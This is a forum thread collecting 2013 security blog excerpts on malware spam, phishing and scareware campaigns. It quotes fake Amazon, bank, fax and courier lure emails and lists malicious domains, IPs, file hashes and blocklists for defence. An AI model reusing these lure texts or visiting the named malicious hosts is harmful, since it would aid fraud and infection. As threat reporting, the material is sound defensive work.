- http://blog.dynamoo.com/2013/12/another-day-another-fake-efax-spam.html
3 Dec 2013 - "These fake eFax spams are getting a bit dull. As you might expect, this one comes with a malicious attachment.
Date: Tue, 3 Dec 2013 15:15:03 -0800 [18:15:03 EST]
From: eFax Corporate [message@ inbound .efax .com]
Subject: Fax transmission: -5219616961-5460126761-20130705352854-84905.zip
Please find attached to this email a facsimile transmission we have just received on your behalf
(Do not reply to this email as any reply will not be read by a real person)

Attached is a ZIP file which in this case is called -2322693863-6422657608-20130705409306-09249.zip (with a VirusTotal detection rate of 6/48*) which in turn contains a malicious executable fax-report.exe which has an icon that makes it look like a PDF file and has a VirusTotal detection rate of 4/48**.
> http://1.bp.blogspot.com/-riDinrvAIZ8/Up5qPTdSDVI/AAAAAAAACTM/5XIcLTSsYks/s1600/fax-report.png
Automated analysis tools... show an attempted communication with tuhostingprofesional .net on 188.121.51.69 (GoDaddy, Netherlands) which contains about 8 legitimate domains which may or may not have been compromised."
* https://www.virustotal.com/en/file/a675bb8d8d32d11a1262abde0250616908fd79cbedde9f11e339597c760e9e1b/analysis/1386113630/

** https://www.virustotal.com/en/file/31cd9cd01c86abacdb78c5277bec57464b51a95533084a937b0666007b318dc4/analysis/1386113237/
___

Fake Fax/Voice SPAM - malicious attachment
- http://blog.mxlab.eu/2013/12/03/email-faxnachricht-von-unknown-an-03212-1298305-contains-trojan/
Dec 3, 2013 - "... new trojan distribution campaign by email with the subject “Faxnachricht von unknown an 03212-1298305″. This email is send from the spoofed address “”WEB.DE Fax und Voice” <fax-021213-voice@webde.de>” and has the followingvery short body:
Fax und Voice
The attached ZIP file has the name WEB.DE Fax und Voice.zip and contains the 120 kB large file WEB.DE Fax und Voice.exe. The trojan is known as TR/Dropper.VB.3500, Virus.Win32.Heur.p, Trojan.Packed.25042, Win32/TrojanDownloader.Wauchos.X, PE:Trojan.VBInject!1.64FE or Troj/Agent-AFAX. At the time of writing, 15 of the 48 AV engines did detect the trojan at Virus Total. Use the Virus Total permalink* and Malwr permalink** for more detailed information."
SHA256: 8d2fe8b6c370c0568f93bb4eee838dc4514f2cc5578424b7376ed21e4ca9091b
* https://www.virustotal.com/en/file/8d2fe8b6c370c0568f93bb4eee838dc4514f2cc5578424b7376ed21e4ca9091b/analysis/

** https://malwr.com/analysis/ZWMxYjQ3YWEyNzY0NGVlNjgyMWVkNzI5OGUwZmEwZGQ/
___

Fake Mastercard SPAM - malicious attachment
- http://blog.mxlab.eu/2013/12/03/important-notification-for-a-mastercard-holder-with-trojan-disguised-as-email-from-mastercard/
Dec 3, 2013 - "... trojan distribution campaign appears with more or less the same lay out in the email that targets Mastercard holders with the subject “Important notification for a Mastercard holder”. MX Lab... intercepted these emails that are sent from the spoofed address “MasterCard” and has the following body:
Important notification for a Mastercard holder!
Your Bank debit card has been temporarily blocked
We’ve detected unusual activity on your Bank debit card . Your UK Bank debit card has been temporarily blocked, please fill document in attachment and contact us
About MasterCard Global Privacy Policy Copyright Terms of Use
© 1994-2013 MasterCard

Screenshot: http://img.blog.mxlab.eu/2013/20131203_mastercard.gif

The attached ZIP file has the name MasterCard_D77559FFA7.zip and contains the 131 kB large file MasterCard_info_pdf_34857348957239509857928472389469812364912034237412893476812734.pdf.exe. The trojan is known as PasswordStealer.Fareit, Trojan-PWS/W32.Tepfer.131072.HS, PE:Malware.Obscure/Huer!1.9E03, Troj/Agent-AFAZ or Trojan.DownLoader9.22851. At the time of writing, 12 of the 48 AV engines did detect the trojan at Virus Total. Use the... Malwr permalink* for more detailed information."
* https://malwr.com/analysis/Yjk0NjczNDAyMDZlNDMzMDk4NjU5NGQzOGQyNGM0OTU/
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Fax and Voice Notification Email Messages - 2013 Dec 03
Fake Purchase Order Request Email Messages - 2013 Dec 03
Fake Payment Confirmation Notification Email Messages - 2013 Dec 03
Fake Shipping Order Information Email Messages - 2013 Dec 03
Fake Product Inquiry Email Messages - 2013 Dec 03
Fake Product Purchase Order Email Messages - 2013 Dec 03
Fake Meeting Invitation Email Messages - 2013 Dec 03
Fake Fax Message Delivery Email Messages - 2013 Dec 03
Fake Failed Delivery Notification Email Messages - 2013 Dec 03
Malicious Personal Pictures Attachment Email Messages - 2013 Dec 03
Fake Payment processing Notification Email Messages - 2013 Dec 03
Fake Unpaid Debt Invoice Email Messages - 2013 Dec 03
Email Messages with Malicious Attachments - 2013 Dec 03
Fake Product Order Quotation Email Messages - 2013 Dec 03
Fake Payroll Invoice Notification Email Messages - 2013 Dec 03
Email Messages with Malicious Attachments - 2013 Dec 03
Fake Financial Document Email Messages - 2013 Dec 03
(More detail and links at the cisco URL above.)

:fear: :mad:

AplusWebMaster
2013-12-04, 13:36
FYI...

Fake Amazon SPAM - malicious attachment
- http://blog.mxlab.eu/2013/12/04/amazon-order-details-email-with-attached-order-details-zip-contains-trojan/
Dec 4, 2013 - "... new trojan distribution campaign by email with the subject “order #852-9045074-5639529 or “order ID801-7322179-4122684". This email is sent from the spoofed address “”AMAZON.CO.UK” <SALES@ AMAZON .CO .UK>”and has the following body:
Good evening,
Thank you for your order. We’ll let you know once your item(s) have dispatched.You can view the status of your order or make changes to it by visiting Your Orders on Amazon.co.uk.
Order Details
Order ID266-3050394-3760006 Placed on December 2, 2013
Order details and invoice in attached file.
Need to make changes to your order? Visit our Help page for more information and video guides.
We hope to see you again soon. Amazon.co.uk

The attached ZIP file has the name Order details.zip and contains the 86 kB large file Order details.exe. The trojan is known as Trojan-PWS.Fareit, Trojan.Inject.RRE, PE:Malware.FakeDOC@CV!1.9C3C or Mal/Generic-S. At the time of writing, 5 of the 46 AV engines did detect the trojan at Virus Total. Use the Virus Total permalink* and Malwr permalink** for more detailed information.
SHA256: 0cb39edbc66388a3315b84e0aa9f95b9e58ce4aab3e3e188ba0537694956afbc."
* https://www.virustotal.com/en/file/0cb39edbc66388a3315b84e0aa9f95b9e58ce4aab3e3e188ba0537694956afbc/analysis/1386150729/

** https://malwr.com/analysis/YTk5MDIzNzM1OTJiNDAwOWExODFhMzYzNDlhY2ZhY2Q/

79.187.164.155 - PL
- https://www.virustotal.com/en/ip-address/79.187.164.155/information/

- http://blogs.appriver.com/Blog/bid/100278/Just-In-Time-for-the-Holidays
Dec 03, 2013 - "... floods of -fake- Amazon.com "Order Details" notifications are hitting our filters... They are out in full force."
Screenshot: http://blogs.appriver.com/Portals/53864/images/Amazon-resized-600.png
___

Fake Amazon.co.uk SPAM / Order details.zip
- http://blog.dynamoo.com/2013/12/fake-amazoncouk-spam-order-detailszip.html
4 Dec 2013 - "This -fake- Amazon spam comes with a malicious attachment:
Date: Wed, 4 Dec 2013 11:07:00 +0200 [04:07:00 EST]
From: "AMAZON.CO.UK" [SALES@ AMAZON .CO .UK]
Subject: order ID718-4116431-2424056
Good evening, Thanks for your order. We'll let you know once your item(s) have dispatched.You can check the status of your order or make changes to it by visiting Your Orders on Amazon.co.uk.
Order Details
Order ID757-7743075-1612424 Placed on December 1, 2013 Order details and invoice in attached file.
Need to make changes to your order? Visit our Help page for more information and video guides.
We hope to see you again soon. Amazon. co .uk

Attached is a ZIP file Order details.zip which in turn contains a malicious executable Order details.exe which has a VirusTotal detection rate of 15/49*. Automated analysis tools... are fairly inconclusive, but do show some apparent traffic to 79.187.164.155 (TP, Poland) plus the creation of a key HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Start WingMan Profiler to run the malware at startup."
* https://www.virustotal.com/en-gb/file/0cb39edbc66388a3315b84e0aa9f95b9e58ce4aab3e3e188ba0537694956afbc/analysis/1386166395/
___

Fake Royal Mail SPAM - malicious attachment
- http://blog.mxlab.eu/2013/12/04/newer-version-of-fake-email-from-royal-mail-regarding-detained-package/
Dec 4, 2013 - "... Today’s campaign is slightly different and carrying a new variant of the trojan. This email is send from the spoofed address “RoyalMail Notification”, the SMTP from address on server level is now noreply@ royalmail .com, the subject has changed to “ATTN: Lost / Missing package” and has the following body:
Mail – Lost / Missing package – UK Customs and Border Protection
Royal Mail has detained your package for some reason (for example, lack of a proper invoice, bill of sale, or other documentation, a possible trademark violation, or if the package requires a formal entry) the RM International Mail Branch holding it will notify you of the reason for detention (in writing) and how you can get it released.
Please fulfil the documents attached.

Screenshot: http://img.blog.mxlab.eu/2013/20131202_royalmail.gif

The attached ZIP file has the name RoyalMail_ID_D6646FD113.zip and contains the 82 kB large file Royal-Mail_Report_03485734895374895637249865238746532649573245.pdf. The trojan is known as TR/Crypt.Xpack.32532, Trojan.DownLoader9.22851, Trojan.Win32.Inject (A), Trojan.Win32.Inject.gtgw, PWSZbot-FMU!4948180CFBA9, Trojan.Agent.ED or Troj/DwnLdr-LEX. This executable will create a process on an infected system, modifies the Windows registry, change the firewall policies, installs itself to run when booting the system, it can steal information from local internet browsers, harvest credentials from FTP clients, collects information to fingerprint the system, peforms HTTP requests and starts servers listening on 0.0.0.0 on port 6274, 0.0.0.0 on port 2865 and 0.0.0.0 on port 0 (note that the ports in use have changed in this new variant).
At the time of writing, 8 of the 47 AV engines did detect the trojan at Virus Total. Use the Virus Total permalink* and Malwr permalink** for more detailed information.
SHA256: 36edcd915f489fcac41d9a8db210db74fb35ccb03c4b86575f0bfa55a8655d66.
UPDATE: The message now comes with subject “Warning: Lost/Missing package” and contains the file RoyalMail_Report_IDEEAA87302A.zip. Once extracted the file Royal_report_4935865497637856239875696597694892346545692354.pdf.exe is available. At the time of writing, 3 of the 49 AV engines did detect the trojan at Virus Total.
Use the Virus Total permalink*** or Malwr permalink**** for more detailed information.
SHA256: 1c264ebf37829848920221b067ef13ad90968b332c91cc04a5f58cb9a0dcc4db."
* https://www.virustotal.com/en/file/36edcd915f489fcac41d9a8db210db74fb35ccb03c4b86575f0bfa55a8655d66/analysis/1386160116/

** https://malwr.com/analysis/MjNjZTZjMzA3YTI4NGI2MmI2NTI3MjRhYzYyN2FkYWY/

*** https://www.virustotal.com/en/file/1c264ebf37829848920221b067ef13ad90968b332c91cc04a5f58cb9a0dcc4db/analysis/1386167663/

**** https://malwr.com/analysis/YTI1YmQxZDk1OTRmNGE5OTg3ZjhmNjkzYzg3N2I4OWE/
___

Fake Dept of Treasury SPAM / FMS-Case.exe
- http://blog.dynamoo.com/2013/12/department-of-treasury-notice-of.html
4 Dec 2013 - "This spam says Salesforce.com at the top but the rest is allegedly from some US Government department or other (pay attention people!). Anyway, it has a malicious attachment.
Date: Wed, 4 Dec 2013 08:24:02 -0500 [08:24:02 EST]
From: "support@salesforce.com" [support@ salesforce .com]
Subject: Department of Treasury Notice of Outstanding Obligation - Case CWK8SSU4K6CN852
Important please review and sign the attached document!
We have received notification from the Department of the Treasury,
Financial Management Service (FMS) that you have an outstanding
obligation with the Federal Government that requires your immediate
attention.
In order to ensure this condition does not affect any planned
contract or grant activity, please review and sign the attached document and if
you are unable to understand the attached document please call FMS at 1-800-304-3107
to address this issue. Please make sure the person making the telephone call has the
Taxpayer Identification Number available AND has the authority/knowledge
to discuss the debt for the contractor/grantee.
Questions should be directed to the Federal Service Desk ...

Attached is a file FMS-Case-CWK8SSU4K6CN852.zip which in turn contains a malicious executable FMS-Case.exe which has a VirusTotal detection rate of 7/49*. Automated analysis tools... show an attempted connection to worldofchamps .com on 198.1.78.171 (Websitewelcome, US) and a download from [donotclick]deshapran .com/img/deshp.exe on 182.18.143.140 (Pioneer eLabs, India). This second part has a VirusTotal detection rate of 6/47**, although automated analysis tools are inconclusive***. I recommend blocking -both- those domains."
* https://www.virustotal.com/en-gb/file/3822905181974a0e22aae2707b1d12b08053b7c988c46a84a57290dcb4574c40/analysis/1386170174/

** https://www.virustotal.com/en-gb/file/a4c4a0cd70470584469c91caed5b803957d0681cf4f91f87f5be77e53b1182bb/analysis/1386170947/

*** https://malwr.com/analysis/NWJmNGQyNjRmMjIyNDFiNTllMzU3ZTE0MTlmMDU0NTY/
___

Job SCAMS - "british-googleapps .com" (and other googleapps .com domains)
- http://blog.dynamoo.com/2013/12/british-googleappscom-and-other.html
4 Dec 2013 - "This following spam email is attempting to recruit money mules:
From: arwildcbrender@ victimdomain .com
to: arwildcbrender@ victimdomain .com
date: 4 December 2013 07:49
subject: Employment you've been searching!
Hello, We have an excellent opportunity for an apprentice applicant to join a rapidly expanding company.
An at home Key Account Manager Position is a great opportunity for stay at home parents
or anyone who wants to work in the comfort of their own home.
This is a part time job / flexible hrs for European citizens only,This is in view of our not having a branch office presently in Europe,
also becouse of paypal and ebay policies wich is prohibit to work directly with residents of some countries.
Requirements: computer with Internet access, valid email address, good typing skills.
If you fit the above description and meet the requirements, please apply to this ad stating your location.
You will be processing orders from your computer. How much you earn is up to you.
The average is in the region of 750-1000 GBP per week, depending on whether you work full or part time.
Region: United Kingdom only.
If you would like more information, please contact us stating where you are located and our job reference number - 42701-759/3HR.
Please only SERIOUS applicants.
If you are interested, please reply to: Gene@british-googleapps .com

Sample subjects include:
Employment you've been searching!
Career opportunity inside
Job ad - see details! Sent through Search engine...
british-googleapps .com is registered with completely fake details and uses a mail server on 50.194.47.186 (Comcast Business, US) to process mail. There are several other similar domain names being used for the same scam... In addition to those, all these following IPs and domains are in use by the scammers either now or recently. All the domains are registered through scam-friendly Chinese registrar BIZCN to ficticious registrants.
50.194.47.186 - US
175.67.90.27 - CN
95.94.135.113 - PT
220.67.126.175 - KR ..."
(Many URLs listed at the dynamoo URL above.)

:mad: :fear:

AplusWebMaster
2013-12-05, 14:37
FYI...

Bogus Firefox and Media Player downloads - 89.248.164.219 and 217.23.2.233
- http://blog.dynamoo.com/2013/12/something-unpleasant-on-89248164219-and.html
5 Dec 2013 - "The IPs 89.248.164.219 (Ecatel, Netherlands) and 217.23.2.233 and (Worldstream, Netherlands) appear to be hosting some sort of -bogus- Firefox* and Media Player** downloads. (You can see the VirusTotal reports here*** and here****). All the domains in use appear at first glance to be genuine but are basically some sort of typosquatting. A full list of all the subdomains I can find are at the end of the blog, but in the meantime I recommend using the following blocklist:
89.248.164.219
217.23.2.233 ..."
(Long list of URLs at the dynamoo URL above.)
* http://urlquery.net/report.php?id=8165658

** http://urlquery.net/report.php?id=8165615

*** https://www.virustotal.com/en-gb/ip-address/89.248.164.219/information/

**** https://www.virustotal.com/en-gb/ip-address/217.23.2.233/information/

Bogus Browser Update ...
- http://www.webroot.com/blog/2013/12/05/compromised-legitimate-web-sites-expose-users-malicious-javasymbianandroid-browser-updates/
Dec 5, 2013 - "... a currently active malicious campaign, relying on redirectors placed at compromised/hacked legitimate Web sites, for the purpose of hijacking the legitimate traffic and directly exposing it to multi mobile OS based malicious/fraudulent content. In this particular case, a -bogus- “Browser Update“, which in reality is a premium rate SMS malware.
Sample screenshot of the landing page upon automatic redirection:
> https://www.webroot.com/blog/wp-content/uploads/2013/12/Compromised_Sites_Traffic_Exchange_Android_Java_Symbian_Malware_Fake_Browser_Update.png
Landing page upon redirection: hxxp ://mobleq .com/e/4366
Domain name reconnaissance: mobleq .com – 91.202.63.75 ...
Detection rates for the multi mobile platform variants:
MD5: a4b7be4c2ad757a5a41e6172b450b617 – * HEUR:Trojan-SMS.AndroidOS.Stealer.a
MD5: 1a2b4d6280bae654ee6b9c8cfe1204ab – ** Java.SMSSend.780; TROJ_GEN.F47V1117
MD5: 2ff587ffb2913aee16ec5cae7792e2a7 – *** ..."
* https://www.virustotal.com/en/file/22278cc82c79d1ea4328d633b9f935db3020e626ade7c77a889d36e1b3b19fce/analysis/

** https://www.virustotal.com/en/file/62ec89a0f6c8f6cd047705793a3fc9818adb5c7f3a098d472bc0b0c4c6a4ee03/analysis/1386176451/

*** https://www.virustotal.com/en/file/7bbe99439e2f50e647c9178343af4b2e8ebec4630fd739e38e2f46e1c7e37bac/analysis/1386176560/

- https://www.virustotal.com/en/ip-address/91.202.63.75/information/
___

Something evil on 192.95.1.190
- http://blog.dynamoo.com/2013/12/something-evil-on-192951190.html
5 Dec 2013 - "It looks like there is some sort of exploit kit on 192.95.1.190 (OVH, Canada) [example*] spreading through injection attacks although at the moment I can't reproduce the issue. In any case, I would recommend -blocking- that IP... Some of the subdomains in use are listed here**..."
(More dot biz URLs listed at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/url/e90cdfb1a187b78997e573ab9fee90442b45c6a95b4281f5f185e458161a79f3/analysis/

** http://pastebin.com/JREzW6vm

- https://www.virustotal.com/en/ip-address/192.95.1.190/information/

:fear::fear: :mad:

AplusWebMaster
2013-12-09, 19:06
FYI...

Malware sites to block 9/12/2013
- http://blog.dynamoo.com/2013/12/malware-sites-to-block-9122013.html
9 Dec 2013 - "These malicious sites and IPs are related to this attack (thanks to the folks at ThreatTrack Security for the tip). Although a lot of the sites are not currently resolving, those that are up are hosted on 37.59.254.224 and 37.59.232.208 which are a pair of OVH IPs suballocated to:
organisation: ORG-RL152-RIPE
org-name: R5X .org ltd
org-type: OTHER
address: Krasnoselskaja 15-219
address: 346579 Moscow
address: RU
abuse-mailbox: abuse@ r5x .org
mnt-ref: OVH-MNT
mnt-by: OVH-MNT
source: RIPE # Filtered
R5X .org IPs have featured a couple of times before here [1] [2] so I would suggest -blocking- any that you find. I'll do some research on those soon, but in the meantime I would recommend blocking the following IPs and domains. Domains that are already flagged by Google are highlighted.
37.59.232.208/28
37.59.254.224/28 ..."
(Many URLs listed at the dynamoo URL above.)
1] http://blog.dynamoo.com/2013/09/6rfnet-and-something-evil-on.html

2] http://blog.dynamoo.com/2012/08/something-evil-on-1786319512826.html

- http://google.com/safebrowsing/diagnostic?site=AS:16276
"... over the past 90 days, 4217 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-12-09, and the last time suspicious content was found was on 2013-12-09..."
___

Fake Billing Invoice malware spam
- http://blog.dynamoo.com/2013/12/tnt-uk-limited-self-billing-invoice.html
9 Dec 2013 - "This fairly terse spam email comes with a malicious attachment:
Date: Mon, 9 Dec 2013 20:32:19 +0800 [07:32:19 EST]
From: Accounts Payable TNT [accounts.payable@ tnt .co .uk]
Subject: TNT UK Limited Self Billing Invoice 5321378841
Download the attachment. Invoice will be automatically shown by double click.

Attached is an archive file called TNT UK Self Billing Invoice.zip (VirusTotal detection rate 6/49*) which in turn contains a malicious executable TNT UK Self Billing Invoice.exe (detection rate 6/47**) which has an icon that makes it look like a PDF file.
> https://lh3.ggpht.com/-NNMZumhc_ug/UqXfV-JQT3I/AAAAAAAACT0/JbtcZarxowE/s1600/tnt.png
Automated analysis tools... show an attempted connection to 2dlife .com on 5.9.182.220 (JoneSolutions.Com, Philippines). I can see only two domains on this server, the other one being 2dlife .fr so I would assume that both are compromised and blocking access to this IP address is the way to go."
* https://www.virustotal.com/en-gb/file/0c00fb260a368c5d404df7e16184d4bb310c94cd9eb98e9cbe4fe31382a973cf/analysis/1386602037/

** https://www.virustotal.com/en-gb/file/29d1353b9c7a3b705b192f63ffe8def30e3079d02356d59c6f82beecb76da113/analysis/1386602000/

- https://www.virustotal.com/en/ip-address/5.9.182.220/information/
___

Multi-hop iframe campaign - client-side exploit malware
- http://www.webroot.com/blog/2013/12/09/malicious-multi-hop-iframe-campaign-affects-thousands-web-sites-leads-cocktail-client-side-exploits-part-two/
Dec 9, 2013 - "... The campaign is not only still proliferating, but the adversaries behind it have also (logically) switched the actual hosting infrastructure... currently active malicious iframe campaign that continues to serving a cocktail of (patched*) client-side exploits, to users visiting legitimate Web sites... Domain names reconnaissance:
hxxp ://www3.judtn3qyy1yv-4.4pu .com – 188.116.34.246
hxxp ://www1.gtyg4h3.4pu .com – 188.116.34.246
find-and-go .com – 78.47.4.17
... malicious scripts, dropped malicious files..."
(More detail at the webroot URL above.)
* http://www.zdnet.com/blog/security/seven-myths-about-zero-day-vulnerabilities-debunked/7026

- https://www.virustotal.com/en/ip-address/188.116.34.246/information/

:fear: :mad:

AplusWebMaster
2013-12-10, 17:50
FYI...

Evil network: R5X .org / OVH
- http://blog.dynamoo.com/2013/12/evil-network-r5xorg-ovh.html
10 Dec 2013 - "Russian web host R5X .org has featured on this blog a few times before, but I took the opportunity to look at it a little more closely... Out of 300 domains that I found hosted now or recently in R5X .org's space (rented from OVH), 177 (59%) are flagged as malicious by Google, and 230 (77%) are flagged as spam or malware by SURBL. MyWOT ratings indicate that there are no legitimate sites in the IP address ranges I checked. R5X .org doesn't have a network of its own but it rents IPs from OVH. I have identified several small netblocks which I strongly recommend that you -block- although there may be others.
37.59.232.208/28
37.59.254.224/28
46.105.166.68/30
46.105.166.96/30
178.33.208.208/30
192.95.7.8/30
192.95.41.88/29
192.95.46.132/30
198.27.103.204/30
198.27.96.132/30 ...
A list of all the domains I can find, current IP addresses, MyWOT rating, the Google prognosis and SURBL codes can be found here* [csv] else I recommend using the following blocklist:
37.59.232.208/28
37.59.254.224/28
46.105.166.68/30
46.105.166.96/30
178.33.208.208/30
192.95.7.8/30
192.95.41.88/29
192.95.46.132/30
198.27.103.204/30
198.27.96.132/30 ..."
(More detail at the dynamoo URL above.)
* http://www.dynamoo.com/files/r5x-org.csv
___

"EUROPOL" scareware / something evil on 193.169.87.247
- http://blog.dynamoo.com/2013/12/europol-scareware-something-evil-on.html
10 Dec 2013 - "193.169.87.247 ("PE Ivanov Vitaliy Sergeevich", Ukraine) is currently serving up scareware claiming that the victim's PC is -locked- using the following domains:
a1751 .com
b4326 .com
d2178 .com
f1207 .com
h5841 .com
k6369 .com
The -scareware- is multilingual and detects the country that the visitor is calling from. In this case I visited from the UK and got the following:
> http://3.bp.blogspot.com/-J6hJIZ3fRzU/UqcdAZQLanI/AAAAAAAACUI/pBsB0ZBF00E/s1600/europol.png
... The text varies depending on the country the visitor is in... The bad guys use subdomains to obfuscate the domain somewhat, so instead of just getting f1207 .com (for example), you get europol.europe .eu.id176630100-8047697129.f1207 .com instead which looks a little more official. You can see some more examples here*... 193.169.87.247 forms part of 193.169.86.0/23 AS48031 which has a so-so reputation according to Google, it does look like there are a lot of legitimate sites in the neighbourhood as well as these malicious ones.
Recommended blocklist:
193.169.87.247
a1751 .com
b4326 .com
d2178 .com
f1207 .com
h5841 .com
k6369 .com
Update: a similar attack has also taken place on 193.169.86.250 on the same netblock."
* https://www.virustotal.com/en-gb/ip-address/193.169.87.247/information/

- https://www.virustotal.com/en-gb/ip-address/193.169.86.250/information/

- http://google.com/safebrowsing/diagnostic?site=AS:48031
"... over the past 90 days, 206 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-12-09, and the last time suspicious content was found was on 2013-12-09..."
___

Fake Amazon .co.uk order SPAM / AM-ORDER-65HNA1972.exe
- http://blog.dynamoo.com/2013/12/fake-amazoncouk-order-spam-am-order.html
10 Dec 2013 - "This -fake- Amazon spam has a malicious attachment:
Date: Tue, 10 Dec 2013 11:19:03 +0200 [04:19:03 EST]
From: blackjacksxjt@ yahoo .com
Subject: order #822-8266277-7103199
Good evening,
Thank you for your order. We�ll let you know once your item(s) have dispatched.You can check the status of your order or make changes to it by visiting Your Orders on Amazon.co.uk.
Order Details
Order #481-0295978-7625805 Placed on December 8, 2013
Order details and invoice in attached file.
Need to make changes to your order? Visit our Help page for more information and video guides.
We hope to see you again soon. Amazon .co .uk

Screenshot: http://techhelplist.com/images/stories/amazon-order-virus-10dec2013.png

Attached is an archive file AM-ORDER-65HNA1972.zip (VirusTotal detections 9/47*) which in turn contains a malicious executable AM-ORDER-65HNA1972.exe (VirusTotal detections 9/49**) which has an icon to make it look like some sort of document.
> https://lh3.ggpht.com/-iL24C02iQD0/Uqc5UVD9uxI/AAAAAAAACUY/mIqo2BZhA4s/s1600/amazon-order.png
Automated analysis tools seem to be timing out... indicating perhaps that it has been hardened against sandbox analysis."
* https://www.virustotal.com/en-gb/file/895ec9342baba173aa0a7583ac548c6647ae833021946a47f532b792ff2fb5a6/analysis/1386690407/

** https://www.virustotal.com/en-gb/file/a1b2ca37ec2e9d0a781a4b21fbb64d8ce76874dbf2ac8d3715b7106afe6eab36/analysis/1386690064/

:fear::fear: :mad:

AplusWebMaster
2013-12-11, 15:42
FYI...

Fake WhatsApp SPAM / IMG003299.zip
- http://blog.dynamoo.com/2013/12/your-friend-has-just-sent-you-pic-spam.html
11 Dec 2013 - "This -fake- WhatsApp message has a malicious attachment.
Date: Wed, 11 Dec 2013 18:29:19 +0700 [06:29:19 EST]
Subject: Your friend has just sent you a pic
Hi!
Your friend has just sent you a photograph in WhatsApp. Open attachments to see what it is.

Screenshot: https://lh3.ggpht.com/-AJQc-jYcGAQ/Uqhm_0JsT9I/AAAAAAAACU4/uu5v94u_a2o/s400/whatsapp.png

Attached to the email is an archive IMG003299.zip (VirusTotal detections 7/43*) which in turn contains a malicious executable IMG003299.exe (VirusTotal detections 9/49**). Automated analysis tools... don't reveal very much about the malware in question however."
* https://www.virustotal.com/en-gb/file/a0b86830e901fd952133622ea6832ce96393c6c700144b5521c7870b1848be5f/analysis/1386767572/

** https://www.virustotal.com/en-gb/file/44e50a568df5633083be84c9dcc82f37a22fa3cedc1d1c50c06e0fe9065f6793/analysis/1386767585/
___

Fake Wells Fargo SPAM / WF_Docs_121113.exe
- http://blog.dynamoo.com/2013/12/wells-fargo-spam-wfdocs121113exe.html
11 Dec 2013 - "This fake Wells Fargo spam has a malicious attachment:
Date: Wed, 11 Dec 2013 17:03:26 +0100 [11:03:26 EST]
From: Kerry Pettit [Kerry.Pettit@ wellsfargo .com]
Subject: FW: Important docs
We have received this documents from your bank, please review attached documents.
Kerry Pettit
Wells Fargo Accounting
817-295-1849 office
817-884-0882 cell Kerry.Pettit@ wellsfargo .com
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE ...

Attached to the email is a ZIP file starting with WF_Docs_ and ending with the first part of the recipient's email address, inside that is a ZIP file with the date encoded into the filename WF_Docs_121113.exe. VirusTotal detections for the ZIP are 6/49* and are 6/47** for the EXE.
Automated analysis... shows an attempted connection to hortonnovak .com on 194.28.87.121 (Hostpro, Ukraine). There is only one site that I can see on this IP, so I would recommend blocking one or the other or -both- of them."
* https://www.virustotal.com/en-gb/file/9d46d60ffbb6e69a73252716c9291009ee3d31b9cfb83911d8b9df3a56db35d6/analysis/1386779806/

** https://www.virustotal.com/en-gb/file/75576d28bbe0f815bc7333696df3646a79edf229e952aac83213754f206cdb79/analysis/1386779808/

- https://www.virustotal.com/en/ip-address/194.28.87.121/information/
___

Facebook Phishing and Malware via Tumblr redirects
- https://isc.sans.edu/diary/Facebook+Phishing+and+Malware+via+Tumblr+Redirects/17207
Last Updated: 2013-12-11 13:43:23 UTC - "... The initial bait is a message that you may receive from one of your Facebook friends, whose account was compromised. The message claims to contain a link to images that show a crime that was committed against the friend or a close relative of the friend. The image below shows an example, but the exact message varies. The images then claim to be housed on Tumblr.
> https://isc.sans.edu/diaryimages/images/Screen%20Shot%202013-12-10%20at%209_37_46%20PM.png
The Tumblr links follow a pattern, but appear to be different for each recipient. The host name is always two or three random English words, and the URL includes a few random characters as an argument. The preview of the Tumblr page lists some random words and various simple icons. Once the user clicks on the link to the Tumblr page, they are immediately redirected to a very plausible Facebook phishing page, asking the user to log in. The links I have seen so far use the "noxxos .pw" domain, which uses a wildcard record to resolve to 198.50.202.224 ... The fake Facebook page will ask the user for a username and password as well as for a "secret question". Finally, the site attempts to run a java applet (likely an exploit, but haven't analyzed it yet), and the site attempts to run a java applet (likely an exploit, but haven't analyzed it yet), and the user is sent to a Youtube look-alike page asking the user to download and install an updated "Youtube Player". The player appears to be a generic downloader with mediocre AV detection.
- https://www.virustotal.com/en/file/d23456ffeaad7183176e71870957a222d20025a35e8e1070bd81bc7491ab625b/analysis/1386730327/
(was 3/42 when I first saw it. Now 10/42 improved). As an indicator of compromise, it is probably best right not to look for DNS queries for "noxxos .pw" as well as connections to 198.50.202.224 ..."

- https://www.virustotal.com/en-gb/ip-address/198.50.202.224/information/
___

NatWest Banking Phish
- http://threattrack.tumblr.com/post/69721298913/natwest-banking-phish
Dec 11, 2013 - "Subjects Seen:
Account Alert !
Typical e-mail details:
Dear <removed>
Your password was entered incorrectly more than 5 times.
Because of that , our security team had to suspend your accounts and all the funds inside.
Your account access and the hold on your funds will be released as soon as you verify your information.
Review Your Account Activity
We are sorry for this inconvenience but this is a security measure which we must apply to ensure your account safety.
If you have already confirmed your information then please disregard this message
Thanks for choosing NatWest UK
NatWest Security Team

Malicious URLs: didooc .co .uk/images/stories/android/index.php
149.255.62.19 - https://www.virustotal.com/en-gb/ip-address/149.255.62.19/information/

Screenshot: https://31.media.tumblr.com/313a5cf56ecbca5bfc7af94a66ca3691/tumblr_inline_mxnvtazkSB1r6pupn.png

:mad: :fear::sad:

AplusWebMaster
2013-12-12, 17:01
FYI...

Top 5 Most Dangerous Email Subjects ...
- http://community.websense.com/blogs/securitylabs/archive/2013/12/11/new-phishing-research-5-most-dangerous-email-subjects-top-10-hosting-countries.aspx
11 Dec 2013 - "... the top five subject lines in worldwide phishing emails are the following: (Based on research conducted 1/1/13-9/30/13)
1. Invitation to connect on LinkedIn
2. Mail delivery failed: returning message to sender
3. Dear <insert bank name here> Customer
4. Comunicazione importante
5. Undelivered Mail Returned to Sender
The list above portrays how cybercriminals are attempting to fool recipients into clicking a malicious link or downloading an infected file by using business-focused and legitimate-looking subject lines. Scammers will use any means necessary to increase the likelihood of an inspire-to-click campaign...
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Components.ImageFileViewer/CommunityServer.Blogs.Components.WeblogFiles.securitylabs/1067.3364.Spearphising_2D00_Infographic_2D00_ml_2D00_Nov2013_5F00_WEB.jpg_2D00_550x0.jpg
___

Fake tech support scams/SPAMs on YouTube
